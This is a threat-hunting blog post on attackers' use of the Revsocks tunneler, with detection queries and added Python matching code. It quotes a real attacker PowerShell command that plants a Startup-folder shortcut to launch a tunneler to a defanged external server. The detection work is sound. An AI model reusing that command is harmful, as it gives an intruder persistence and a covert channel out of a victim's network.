178. Hunting for Another Tunneler: Revsocks

Hello everyone!

Tunnelers are everywhere! And this one is becoming more and more popular among threat actors: Revsocks. Let's look at how this tool is abused in the wild.

Here's an example. The adversary abused PowerShell to create a shortcut in the Startup folder that executes revsocks (with the shortcut's arguments pointing the tunneler at its server):

powershell -Command "$s = (New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\m4.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Microsoft\Windows\m4.exe'; $s.Arguments = '-connect hxxps://metallurgify[.]com:16443 -tls -pass 1488 -ws'; $s.WorkingDirectory = 'C:\Users\user\AppData\Local\Microsoft\Windows'; $s.Save();"

So, the first hunting idea is to search for creating shortcuts with PowerShell:

event_type: "processcreatewin"

AND

proc_file_name: "powershell.exe"

AND

cmdline: "createshortcut"

Another one - hunting for revsocks-related command line arguments:

event_type: "processcreatewin"

AND

cmdline: ("connect" AND "pass")
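As an added illustration (not part of the original post), here are both hunting ideas above expressed as Python predicates and run over a few constructed process-creation events; the field names follow the queries in the post, and the extra startup_lnk_target check (the Startup-folder path extraction) is my own addition.

```python
# Added example (not from the post): the two hunting queries above as Python
# predicates; field names follow the post's queries, all sample events are constructed.
import re

def matches_ps_shortcut(ev):
    """Hunt 1: powershell.exe whose command line calls CreateShortcut."""
    return (ev.get("event_type") == "processcreatewin"
            and ev.get("proc_file_name", "").lower() == "powershell.exe"
            and "createshortcut" in ev.get("cmdline", "").lower())

def matches_revsocks_args(ev):
    """Hunt 2: the post's loose query, cmdline containing 'connect' and 'pass'."""
    cmd = ev.get("cmdline", "").lower()
    return (ev.get("event_type") == "processcreatewin"
            and "connect" in cmd and "pass" in cmd)

def startup_lnk_target(ev):
    """Extra context: the .lnk path if CreateShortcut writes into a Startup folder."""
    m = re.search(r"createshortcut\('([^']+)'\)", ev.get("cmdline", ""), re.I)
    if m and re.search(r"\\start menu\\programs\\startup\\", m.group(1), re.I):
        return m.group(1)
    return None

def hunt(events):
    """Return (event index, [names of hunts that fired]) for each matching event."""
    hits = []
    for i, ev in enumerate(events):
        names = []
        if matches_ps_shortcut(ev):
            names.append("ps_createshortcut")
        if matches_revsocks_args(ev):
            names.append("revsocks_args")
        if startup_lnk_target(ev):
            names.append("startup_lnk")
        if names:
            hits.append((i, names))
    return hits

# Constructed sample events: 0 mirrors the post's command line, 1 is the tunneler
# starting, 2 is benign, 3 is benign but contains "connect" and "pass" (via "Bypass").
SAMPLE_EVENTS = [
    {"event_type": "processcreatewin", "proc_file_name": "powershell.exe",
     "cmdline": "powershell -Command \"$s = (New-Object -COM WScript.Shell).CreateShortcut('C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\m4.lnk'); $s.Arguments = '-connect hxxps://metallurgify[.]com:16443 -tls -pass 1488 -ws'; $s.Save();\""},
    {"event_type": "processcreatewin", "proc_file_name": "m4.exe",
     "cmdline": "m4.exe -connect hxxps://metallurgify[.]com:16443 -tls -pass 1488 -ws"},
    {"event_type": "processcreatewin", "proc_file_name": "powershell.exe",
     "cmdline": "powershell -Command \"Get-ChildItem C:\\Temp\""},
    {"event_type": "processcreatewin", "proc_file_name": "powershell.exe",
     "cmdline": "powershell -ExecutionPolicy Bypass -Command \"Test-NetConnection fileserver -Port 445\""},
]
```

Note that the fourth sample (a benign "-ExecutionPolicy Bypass ... Test-NetConnection" command line) also trips the second query because of substring matching, so in practice you would tune it towards the exact "-connect" and "-pass" switches or pair it with the Startup-folder context.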

See you tomorrow!
